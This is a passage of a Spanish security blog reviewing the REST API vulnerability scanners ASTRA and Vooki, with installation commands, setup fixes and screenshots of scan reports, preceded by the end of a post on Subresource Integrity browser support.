<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 217px; overflow: hidden; width: 624px;"><img height="217" src="https://lh6.googleusercontent.com/w389QiVVuXS1bZqvhaFyFG8Co1SgJ79x4Izemj9xrLSn9i-9dQEYnEb4UAm-RW1vwoIJxbxXsbfSs2893ov13nS9HcV6EarbIuU1cObprhIf8al_csm0oMfmM_Aj4rKGlBm3SZ9m" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>CUADRO DE COMPATIBILIDAD CON NAVEGADORES:</b></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">En la siguiente tabla podemos ver la compatibilidad del parámetro integrity con los diferentes </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">navegadores que tenemos en el mercado.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 192px; overflow: hidden; width: 624px;"><img height="192" src="https://lh4.googleusercontent.com/xIaI3bFRkr4yDp4k3PUUsMQArqJP4WGVAJOVnCBgBGFVrRm0DzWFJtTmqpwaVGDpZ5poBW0oC2Y0OQhVnWTU8FH-2IlyA7L4OwZUakGddBA-z2jZ2leCb2e2MdOUw8F-a-74peOc" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-size: xx-small;"><b><i><span style="background-color: transparent; color: black; font-family: "arial"; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Fuente: </span><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-variant: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity" style="text-decoration: none;">https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity</a></span></i></b></span></div>
<div>
<br /></div>
Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019260 Alcolea del Pinar, Guadalajara, Spain41.0363969 -2.467214499999954641.0304084 -2.4772994999999547 41.0423854 -2.4571294999999544tag:blogger.com,1999:blog-4789894782637921835.post-13619329828284113462020-01-31T23:24:00.002+01:002020-01-31T23:24:48.524+01:00ASTRA: REST API penetration testing<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy2mPPHBflWWYCKYJj21yzYtjz103iZDyjf_TgtQYHDWsqPjShPb8rQ6sLJR3_UivZiKnwkTf9iY8pj5f7LACUxj-nmy27i2yodjIDLsL8Kzj0hSmsuQwMCJhL4Yqqr0sJMT3siyC3XZ3U/s1600/Ejecutando.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="713" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy2mPPHBflWWYCKYJj21yzYtjz103iZDyjf_TgtQYHDWsqPjShPb8rQ6sLJR3_UivZiKnwkTf9iY8pj5f7LACUxj-nmy27i2yodjIDLsL8Kzj0hSmsuQwMCJhL4Yqqr0sJMT3siyC3XZ3U/s640/Ejecutando.PNG" width="640" /></a></div>
<br />
<br />
by @raulrenales<br />
<br />
<div style="text-align: justify;">
Como ya sabéis, llevamos un tiempo profundizando en el análisis de APIs desde el punto de vista del pentesting y la auditoria. Iniciamos el camino con <a href="https://honeysec.blogspot.com/2019/11/arsenal-de-herramientas-para-auditar-la.html">un post en el que resumíamos herramientas interesantes para esta tarea</a>, poco a poco vamos haciendo review de las mismas. Hoy le toca el turno a ASTRA REST API Tool.</div>
<br />
<a name='more'></a>Primero de todo, podéis descargar ASTRA desde su github:<br />
<br />
<a href="https://github.com/flipkart-incubator/Astra">https://github.com/flipkart-incubator/Astra</a><br />
<br />
ASTRA es una herramienta bastante completa y que es una de las fijas en el análisis de APIs, la herramienta cubre las siguientes vulnerabilidades:<br />
<br />
<ul>
<li>SQL injection</li>
<li>Cross site scripting</li>
<li>Information Leakage</li>
<li>Broken Authentication and session management</li>
<li>CSRF (including Blind CSRF)</li>
<li>Rate limit</li>
<li>CORS misconfiguration (including CORS bypass techniques)</li>
<li>JWT attack</li>
<li>CRLF detection</li>
<li>Blind XXE injection</li>
</ul>
<div>
Como podéis ver es bastante completa, vamos a ver un poco su funcionamiento e instalación.</div>
<div>
<br /></div>
<h3>
Instalación:</h3>
<br />
La herramienta requiere el uso de un sistema operativo Linux o MacOS, dicho sistema debe estar provisto de Python 2.7 y MongoDB. Instalarlo es tan sencillo, a priori, como seguir los siguientes comandos:<br />
<br />
<blockquote class="tr_bq">
$ git clone https://github.com/flipkart-incubator/Astra<br />$ cd Astra<br />$ sudo pip install -r requirements.txt</blockquote>
<br />
En la pagina de proyecto de ASTRA se puede obtener información sobre como instalar en Docker la herramienta.<br />
<br />
Una vez instalado arrancamos MongoDB y probamos que esta corriendo antes de lanzar el comando de ASTRA.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimN831xUjCMd0cE2_VpyzGr-A3iGQmBiVAle_p4EJOMhxv2TstHqHqG6-pG5yzJuB1Vf35_U7VwqCeHsZsXjqUuLmSz8OQOFd1CIUnjDKoH8SjSKiAc-HMSWQ_x1j8igYQsUQ807ylAVna/s1600/MongoDB+arrancado.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="210" data-original-width="1040" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimN831xUjCMd0cE2_VpyzGr-A3iGQmBiVAle_p4EJOMhxv2TstHqHqG6-pG5yzJuB1Vf35_U7VwqCeHsZsXjqUuLmSz8OQOFd1CIUnjDKoH8SjSKiAc-HMSWQ_x1j8igYQsUQ807ylAVna/s640/MongoDB+arrancado.PNG" width="640" /></a></div>
<br />
Si tu distribución no dispone de MongoDB, <a href="https://www.digitalocean.com/community/tutorials/como-instalar-mongodb-en-ubuntu-18-04-es">te recomendamos que sigas este enlace para instalarlo</a>.<br />
<br />
Con MongoDB listo, vamos a lanzar el cliente en modo ayuda, para ver que todo esta ok y pasar a lanzar el user interface web.<br />
<br />
En nuestro caso, sufrimos algunos contratiempos con el archivo ASTRA.PY. Concretamente en la linea 38 nos daba un error en el que nos indicaba que no podia lanzar la funcion Main. Despues de un rato decidimos comentar la linea para evitar el error y ver que sucedia. Inicialmente funciono.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiITzlTeUEc94G341sVKfMn5jN8HlGk4VrUbw3FqN30fUeHzFoa8RCmtaQIVUfycmN7LgRtUxI20f8pLtd32b01oyaQ_HYf_i9KBEqyCr3CF1xKXOM2Nug5IJIQoNfyqyPOS0kY1M8ol-Bi/s1600/error+38.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="191" data-original-width="705" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiITzlTeUEc94G341sVKfMn5jN8HlGk4VrUbw3FqN30fUeHzFoa8RCmtaQIVUfycmN7LgRtUxI20f8pLtd32b01oyaQ_HYf_i9KBEqyCr3CF1xKXOM2Nug5IJIQoNfyqyPOS0kY1M8ol-Bi/s640/error+38.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtXaqaCyc6Nk6EMGYNpWyiYy9FW6-9-dBwP-9xt0VvtRZlmMPjkdYtmM5wS27LW6S6hikjVNJIY0G_Lv68Mrvk6mL4-lA4grqOVABfWD8fdrs1_bDg87HZF6g2BhRTExIhoIxd_vIIonVk/s1600/Arreglando+el+Error.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="659" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtXaqaCyc6Nk6EMGYNpWyiYy9FW6-9-dBwP-9xt0VvtRZlmMPjkdYtmM5wS27LW6S6hikjVNJIY0G_Lv68Mrvk6mL4-lA4grqOVABfWD8fdrs1_bDg87HZF6g2BhRTExIhoIxd_vIIonVk/s640/Arreglando+el+Error.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Este cambio nos produjo que dbupdate sufriera un problema de identación y decidimos sacarla de la función, para meter la linea por encima del "IF os.getcwd" dado que esta variable es necesaria para que los escaneos puedan escribir en la base de datos. Nuestra ñapa quedo así:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1l-cPm6Z2RQzx5MuR_I5el-yRbdzVqzsr3-bgmL68FQAlYJcBoC9WLnTc-tAsYBhj4ZVRRMKzsSPE4TnGP79VSJJmUQbHKbNDQlum_smQPbYUPkeSJ0yvT5F5eoxU0Df5hyphenhyphenVRCHdCDIkj/s1600/Chapuza+de+Raul.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="295" data-original-width="553" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1l-cPm6Z2RQzx5MuR_I5el-yRbdzVqzsr3-bgmL68FQAlYJcBoC9WLnTc-tAsYBhj4ZVRRMKzsSPE4TnGP79VSJJmUQbHKbNDQlum_smQPbYUPkeSJ0yvT5F5eoxU0Df5hyphenhyphenVRCHdCDIkj/s640/Chapuza+de+Raul.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h3 style="clear: both; text-align: left;">
Uso de la herramienta</h3>
<div class="separator" style="clear: both; text-align: left;">
Después de tanta chapuza en el archivo ASTRA.PY, llega el momento de lanzar la Interfaz web, para ello nos vamos a la carpeta de API y allí ejecutamos el comando que pone a la escucha la aplicación.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both;">
$ cd API<br />$ python api.py</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuazCUHi8T0ugbVdSbNTcga7MotJwIBnxgVZP-9ayRC8sFEWB00_Awfcx_H1d9z_5qCxUUY581pmBiLmOoLmtBt_nGc3Y2noMUJigpMqxXvyhKOsHU5y5u_KV4NRLsXw9W7jbbe44zlCfE/s1600/astra+Web+arrancnado.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="151" data-original-width="923" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuazCUHi8T0ugbVdSbNTcga7MotJwIBnxgVZP-9ayRC8sFEWB00_Awfcx_H1d9z_5qCxUUY581pmBiLmOoLmtBt_nGc3Y2noMUJigpMqxXvyhKOsHU5y5u_KV4NRLsXw9W7jbbe44zlCfE/s640/astra+Web+arrancnado.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Parece que todo funciona, pues vamos a testear que todo esta listo en la dirección:<br />
<br />
<blockquote class="tr_bq">
http://127.0.0.1:8094</blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ZbyCJbXeyDJR6gULdOYoDLhzMY6jDTplRTswDyFHMsmL84b53Hz0MKPA2Do3g_z4beAE2YATckh2JprSCn2J8B4awfYWM-mOU3JyPpoi8XEaYlFut-_aPgm8kFcDYoWRlZEWYUlsPkUQ/s1600/Astra+Web.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="661" data-original-width="1318" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ZbyCJbXeyDJR6gULdOYoDLhzMY6jDTplRTswDyFHMsmL84b53Hz0MKPA2Do3g_z4beAE2YATckh2JprSCn2J8B4awfYWM-mOU3JyPpoi8XEaYlFut-_aPgm8kFcDYoWRlZEWYUlsPkUQ/s640/Astra+Web.PNG" width="640" /></a></div>
<br />
Como vemos la interfaz web esta lista para hacer nuestro primer escaneo. Es tan sencillo como asignarle un nombre al escaneo (Product Name) e indicarle la URL de la api, así como el metodo.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9BNaTY_y-6f1F2Ng3X_aJxuYQUX_D-2bVDVkeiLxe3NPsaCOjq47KfhR5iKKvxSwo6f06TCQ6yuMMDapOBElP5jsCjrBedbfbifLS_cYTli6Zk782vqcvEo92Ywrbdzcajxexz4Z5bE1R/s1600/Web+Scan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="729" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9BNaTY_y-6f1F2Ng3X_aJxuYQUX_D-2bVDVkeiLxe3NPsaCOjq47KfhR5iKKvxSwo6f06TCQ6yuMMDapOBElP5jsCjrBedbfbifLS_cYTli6Zk782vqcvEo92Ywrbdzcajxexz4Z5bE1R/s640/Web+Scan.PNG" width="640" /></a></div>
<br />
Una vez que tenemos todo listo, pulsamos en el botón de submit y veremos que si todo ha ido bien aparecerá una ventana emergente con el código asignado al análisis.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgReM9tINv-f6l7Kw4u5JnZPdE9rTVC9Zj6EF5_cFUDGrBPKo9-kFpxdAh6w7dKnm6d-h6KR6LSLDvfyMj-RsmwPOSK4v4kRZyrEiylTU7u_X9I9VPhD-fPC7FjWPCgX3JGQClVWDGu1CX5/s1600/Ejecutando+Scan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="993" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgReM9tINv-f6l7Kw4u5JnZPdE9rTVC9Zj6EF5_cFUDGrBPKo9-kFpxdAh6w7dKnm6d-h6KR6LSLDvfyMj-RsmwPOSK4v4kRZyrEiylTU7u_X9I9VPhD-fPC7FjWPCgX3JGQClVWDGu1CX5/s640/Ejecutando+Scan.PNG" width="640" /></a></div>
<br />
Si os fijáis en la parte inferior aparecerá un reporte que en la ultima columna indicara el estado del mismo, por lo general tarda un poco en terminar e indicar que el informe esta completo y listo para ser revisado.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6fbwzkjAi1Obj1R5Bbui1p8HMhCKDfyrtjiUH_7NEjmEVX-nkJ6yzz7Fn1xkPB2cyRN9fQw8J8AZVaeTYIympwh5JS4qhhocl-8ox45TnvAX-eh84i3VNco1wKqRjhxXtoi-IbfrKXJOL/s1600/reportes.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="118" data-original-width="749" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6fbwzkjAi1Obj1R5Bbui1p8HMhCKDfyrtjiUH_7NEjmEVX-nkJ6yzz7Fn1xkPB2cyRN9fQw8J8AZVaeTYIympwh5JS4qhhocl-8ox45TnvAX-eh84i3VNco1wKqRjhxXtoi-IbfrKXJOL/s640/reportes.JPG" width="640" /></a></div>
Una vez completado podréis ver el resultado pulsando en la columna URL en el informe que querais revisar. Mas o menos veréis este detalle de las vulnerabilidades:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfWpY9RhabcAJzELk_WwjgWMjut-jT8ahVb1jB17ivC3VZ4puFwOGd_4re9vDhA6NgN3z9kkULdYY6KDTB34T_v94ydxtXyfeTKOEuHggjL5ijMexKciwF8g0c0gQZc2irlgVnB85qkZ0m/s1600/Astra+informe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="389" data-original-width="894" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfWpY9RhabcAJzELk_WwjgWMjut-jT8ahVb1jB17ivC3VZ4puFwOGd_4re9vDhA6NgN3z9kkULdYY6KDTB34T_v94ydxtXyfeTKOEuHggjL5ijMexKciwF8g0c0gQZc2irlgVnB85qkZ0m/s640/Astra+informe.PNG" width="640" /></a></div>
<br />
Pulsando en cada una de las vulnerabilidades veremos el detalle:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiONW34A1YzTq8uEGkiDtYB0nnsfplCM_7Zglgbsora369kxagcWInJ-qVT7SnkOPkC0BRk3YgtrIwcR3huQh8HjnFqrtXVQu7bbditPU_YhlfRCm5c9V0Gl7x9NAT5BZ5aZOLVbWrWX1_W/s1600/Astra+informe+detallado.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="1088" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiONW34A1YzTq8uEGkiDtYB0nnsfplCM_7Zglgbsora369kxagcWInJ-qVT7SnkOPkC0BRk3YgtrIwcR3huQh8HjnFqrtXVQu7bbditPU_YhlfRCm5c9V0Gl7x9NAT5BZ5aZOLVbWrWX1_W/s640/Astra+informe+detallado.PNG" width="640" /></a></div>
<br />
Y hasta aquí nuestra revisión de la herramienta ASTRA REST API Tool. En el futuro queremos ampliar este contenido incluyendo algunos casos de uso especiales que de vez en cuando nos encontramos.<br />
<br />
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019432 Renales, Guadalajara, Spain40.9128031 -2.526601900000059740.9068031 -2.53668690000006 40.9188031 -2.5165169000000596tag:blogger.com,1999:blog-4789894782637921835.post-89326265468549390472020-01-28T16:57:00.000+01:002020-01-28T16:57:46.660+01:00Vooki – Rest API Scanner<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-PuAVZr7DwozD1DQXkZ1sQQX-xeSPF2vDXdERaQ5Xqe8c_h_0YLL3NuOSLp5O4okLUdsg8u-oyk1i9zjSKMxZEJ2q2K4zS46W3u73d40J_iZZJkta_No9mQm-Lnyou78cpmEjZxoQ-sQJ/s1600/Vooki5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="565" data-original-width="1435" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-PuAVZr7DwozD1DQXkZ1sQQX-xeSPF2vDXdERaQ5Xqe8c_h_0YLL3NuOSLp5O4okLUdsg8u-oyk1i9zjSKMxZEJ2q2K4zS46W3u73d40J_iZZJkta_No9mQm-Lnyou78cpmEjZxoQ-sQJ/s640/Vooki5.PNG" width="640" /></a></div>
<br />
<br />
<span style="background-color: white; font-family: "trebuchet ms" , "trebuchet" , "verdana" , sans-serif; font-size: 13.2px;">By @raulrenales & @db3rn4l</span><br />
<br />
Pues seguimos trabajando con herramientas de análisis de APIs, como ya sabéis el objetivo es crear un pequeño arsenal y que vayamos probando una a una para ver que tal funcionan. Hoy presentamos Vooki, un scanner con dos sabores, aplicaciones web y APIs.<br />
<br />
El escáner de aplicaciones REST de Vooki es una herramienta automatizada para escanear y detectar vulnerabilidades en la API REST. Nuestra herramienta ayuda a descubrir las vulnerabilidades con facilidad, es muy fácil y efectivo e incluye funciones para importar los datos de Postman.<br />
<a name='more'></a>El scanner soporta las siguientes vulnerabilidades:<br />
<br />
<ul>
<li>Inyección SQL</li>
<li>Inyección de comandos</li>
<li>Inyección de encabezado</li>
<li>Scripting entre sitios: reflejado.</li>
<li>Secuencias de comandos entre sitios: almacenadas.</li>
<li>Scripting entre sitios: basado en dom.</li>
<li>Faltan encabezados de seguridad</li>
<li>Divulgación de información confidencial en encabezados de respuesta</li>
<li>Divulgación de información confidencial en mensajes de error</li>
<li>Falta la validación de entrada del lado del servidor</li>
<li>Uso no deseado de métodos HTTP</li>
<li>Respuesta HTTP incorrecta</li>
</ul>
<br />
<br />
Primero de todo podéis conseguir Vooki en la siguiente url: <a href="https://www.vegabird.com/vooki/">https://www.vegabird.com/vooki/</a><br />
<br />
Lo tenéis disponible para windows y para mac.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhucn529jeJwo82bgoXz-nKm7Zw09qNXgBt64r0n3hV4vZOya8ryxnjhszlSEt7CjtMuIJVC8_Favp_jE8_uBYZ3_IDL74FOB3KJI0LDQOdqPqW_TSAxETi2wtjSuG3RpqKQNNsmKKP7EgQ/s1600/Vooki000.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="1029" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhucn529jeJwo82bgoXz-nKm7Zw09qNXgBt64r0n3hV4vZOya8ryxnjhszlSEt7CjtMuIJVC8_Favp_jE8_uBYZ3_IDL74FOB3KJI0LDQOdqPqW_TSAxETi2wtjSuG3RpqKQNNsmKKP7EgQ/s400/Vooki000.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Una vez descargado e instalado la primera decisión es si queremos utilizar el scanner para web o el scanner para APIs.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCQYInUjhIHGS8phXqQuOBSM61t8V0YiA9dL6s9ZNQyn-W59PA07UhgOk-0lYXLzVtIffHFnrc-4YsWyGo7o-mM3t7nwPMTnFBxkViXdmIcIZcP-3JxoyAtuVU8PxxhrDiyyqflagHGHqp/s1600/Vooki0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="535" data-original-width="537" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCQYInUjhIHGS8phXqQuOBSM61t8V0YiA9dL6s9ZNQyn-W59PA07UhgOk-0lYXLzVtIffHFnrc-4YsWyGo7o-mM3t7nwPMTnFBxkViXdmIcIZcP-3JxoyAtuVU8PxxhrDiyyqflagHGHqp/s320/Vooki0.PNG" width="320" /></a></div>
<br />
En nuestro caso vamos a utilizar el REST API SCANNER para analizar una API de ejemplo. Una vez seleccionado podemos iniciar nuestro analisis creando un proyecto en le menu FILE.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdphQS_uAoPtbXoxDQJjWVkBL2gu3je45gE5j_IkpkiFpZaYUJbF06QC69Vj3ef6E0l0mywx1A7uy3HS9lC4hFq1_EdHhReVviXXRudlrax6IrDPh_WSa07dwz0nz2qOYZjLHDxOj1BURE/s1600/Vooki1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="1360" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdphQS_uAoPtbXoxDQJjWVkBL2gu3je45gE5j_IkpkiFpZaYUJbF06QC69Vj3ef6E0l0mywx1A7uy3HS9lC4hFq1_EdHhReVviXXRudlrax6IrDPh_WSa07dwz0nz2qOYZjLHDxOj1BURE/s640/Vooki1.PNG" width="640" /></a></div>
<br />
Creamos un nuevo proyecto y vemos como en la barra de la izquierda nos aparece una carpeta. Pulsando con el botón derecho sobre ella podemos registrar una llamada. En este caso vamos a utilizar una API muy simple de JsonPlaceholder. Como veis en la imagen anterior, añadimos la petición en la caja de texto y seleccionamos el método GET, pulsamos en enviar. Automáticamente en la parte inferior veremos el resultado de la petición.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM37BBim8qdsok1HbXl_ynMH5AuZtKnDO5pucHRDXxvIKnTPAv7qZsxHJMQvedF4I_1ptHbKYqGMNJx_sM7FDfRPj6OWt_NCa2oMfL2L6cdqVPbCx2Bg3R__fjOg1qNs6x9t5vDEbfWm-L/s1600/Vooki2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="941" data-original-width="1423" height="422" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM37BBim8qdsok1HbXl_ynMH5AuZtKnDO5pucHRDXxvIKnTPAv7qZsxHJMQvedF4I_1ptHbKYqGMNJx_sM7FDfRPj6OWt_NCa2oMfL2L6cdqVPbCx2Bg3R__fjOg1qNs6x9t5vDEbfWm-L/s640/Vooki2.PNG" width="640" /></a></div>
<br />
Al final vemos el resultado de la petición.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfRrNHgpToovE8NuHPLsv5_w6T6ivpklHli4qBYBymobwOk9WnHMciTrT93nsizeytxBzrubSUBYWT182wpc9S6VtDrUNphKPgG8TW1BX48jOOm7tqxP0ritbRvdOanGuptgPRVYfaAn-P/s1600/Vooki3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="466" data-original-width="1246" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfRrNHgpToovE8NuHPLsv5_w6T6ivpklHli4qBYBymobwOk9WnHMciTrT93nsizeytxBzrubSUBYWT182wpc9S6VtDrUNphKPgG8TW1BX48jOOm7tqxP0ritbRvdOanGuptgPRVYfaAn-P/s640/Vooki3.PNG" width="640" /></a></div>
<br />
Si lo que queremos es scanear las vulnerabilidades relacionadas con esta API disponemos de la opción manual de añadir a la petición nuestro payload o utilizar un scanner automatico que nos dara todas las vulnerabilidades asociadas.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht7gkL8iIHNxFdR2nizB80Gksi2U1HCtJpoVe8MpedZ9XpERm_I23JyEZdkRm8K0zc3lmHJgt8NDRq8fv6Am92dadEoQwE_brS8ttdGdZKdx1XNSgKq5WOAC8uD-T522vfJuuRpdLUBU1g/s1600/Vooki4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="539" data-original-width="476" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht7gkL8iIHNxFdR2nizB80Gksi2U1HCtJpoVe8MpedZ9XpERm_I23JyEZdkRm8K0zc3lmHJgt8NDRq8fv6Am92dadEoQwE_brS8ttdGdZKdx1XNSgKq5WOAC8uD-T522vfJuuRpdLUBU1g/s320/Vooki4.PNG" width="282" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-PuAVZr7DwozD1DQXkZ1sQQX-xeSPF2vDXdERaQ5Xqe8c_h_0YLL3NuOSLp5O4okLUdsg8u-oyk1i9zjSKMxZEJ2q2K4zS46W3u73d40J_iZZJkta_No9mQm-Lnyou78cpmEjZxoQ-sQJ/s1600/Vooki5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="565" data-original-width="1435" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-PuAVZr7DwozD1DQXkZ1sQQX-xeSPF2vDXdERaQ5Xqe8c_h_0YLL3NuOSLp5O4okLUdsg8u-oyk1i9zjSKMxZEJ2q2K4zS46W3u73d40J_iZZJkta_No9mQm-Lnyou78cpmEjZxoQ-sQJ/s640/Vooki5.PNG" width="640" /></a></div>
<br />
Pulsando y seleccionando una de ellas podemos ver los detalles en la parte inferior en la pestaña DETAILS.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
